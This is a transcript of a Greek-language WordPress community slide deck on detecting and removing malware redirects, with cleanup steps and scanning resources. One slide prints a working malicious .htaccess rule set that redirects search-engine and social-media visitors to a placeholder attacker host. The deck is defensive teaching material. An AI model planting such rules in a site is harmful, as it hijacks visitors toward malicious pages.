$30 off During Our Annual Pro Sale. View Details »

Μάκης Μουρελάτος - Εντοπισμός και αφαίρεση Word...

Μάκης Μουρελάτος - Εντοπισμός και αφαίρεση WordPress malware redirect

WordPress Greek Community

November 01, 2018
Tweet

More Decks by WordPress Greek Community

Other Decks in Technology

Transcript

  1. Gerasimos Mourelatos WordPress Security Aficionado “… there are only two

    types of companies: those that have been hacked and those that will be.” Robert Mueller, FBI Director, 2012 @makismour
  2. FACTS source: codeinwp.com/blog/wordpress-statistics Το WordPress έχει τις περισσότερες παραβιάσεις από

    hackers, αυτό όμως δεν σημαίνει ότι είναι και το πιο ευάλωτο. TimThumb, Revslider & Gravity Forms είναι από τα αγαπημένα plugin όσων θέλουν να παραβιάσουν μια WordPress ιστοσελίδα. Μία από τις πιο συνηθισμένες παραβιάσεις είναι τα malicious ή malware redirects.
  3. MALWARE REDIRECT FIVE Ws Who What Where When Why Ένας

    ή περισσότεροι hacker H WordPress ιστοσελίδα σας κάνει redirect σε μια άλλη -ξένη- ιστοσελίδα .htaccess, theme files, plugin files Όταν εσείς κοιμόσαστε!!! Blackhat SEO, Drive by Download
  4. 4. MALWARE ΕΝΤΟΠΙΣΜΟΣ .htaccess located at root & uploads dir

    wp-config.php theme’s header.php footer.php functions.php
  5. .HTACCESS RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR] RewriteCond

    %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC,OR] RewriteCond %{HTTP_REFERER} .twitter. [OR] RewriteCond %{HTTP_REFERER} .blog. [OR] RewriteCond %{HTTP_REFERER} .live. [OR] RewriteCond %{HTTP_REFERER} .myspace. [OR] RewriteCond %{HTTP_REFERER} .linkedin. [OR] RewriteRule .* http://badsite.co/bad.php?m=123 [R,L]
  6. BACKUP!!!!! Αφαίρεση και εκ νέου εγκατάσταση WordPress Αφαίρεση και εκ

    νέου εγκατάσταση όλων των theme Αφαίρεση και εκ νέου εγκατάσταση όλων των plugin MALWARE ΤΟ ΚΡΥΒΕΤΑΙ ΣΤΙΣ ΛΕΠΤΟΜΕΡΕΙΕΣ
  7. Έλεγχος όλων των admin users Έλεγχος και διαγραφή όλων των

    μη WordPress αρχείων και directory Επανάληψη της διαδικασίας σε όλες της ιστοσελίδες που ανήκουν στον ίδιο hosting account MALWARE ΤΟ ΚΡΥΒΕΤΑΙ ΣΤΙΣ ΛΕΠΤΟΜΕΡΕΙΕΣ
  8. • https://wordpress.org/about/security/ • https://malwaredecoder.com/ • https://quttera.com/ • https://www.virustotal.com • https://app.webinspector.com/

    • https://www.google.com/webmasters/tools/googlebot- fetch • https://transparencyreport.google.com/safe-browsing/ search • https://www.linkedin.com/in/makismour/ USEFUL RESOURCES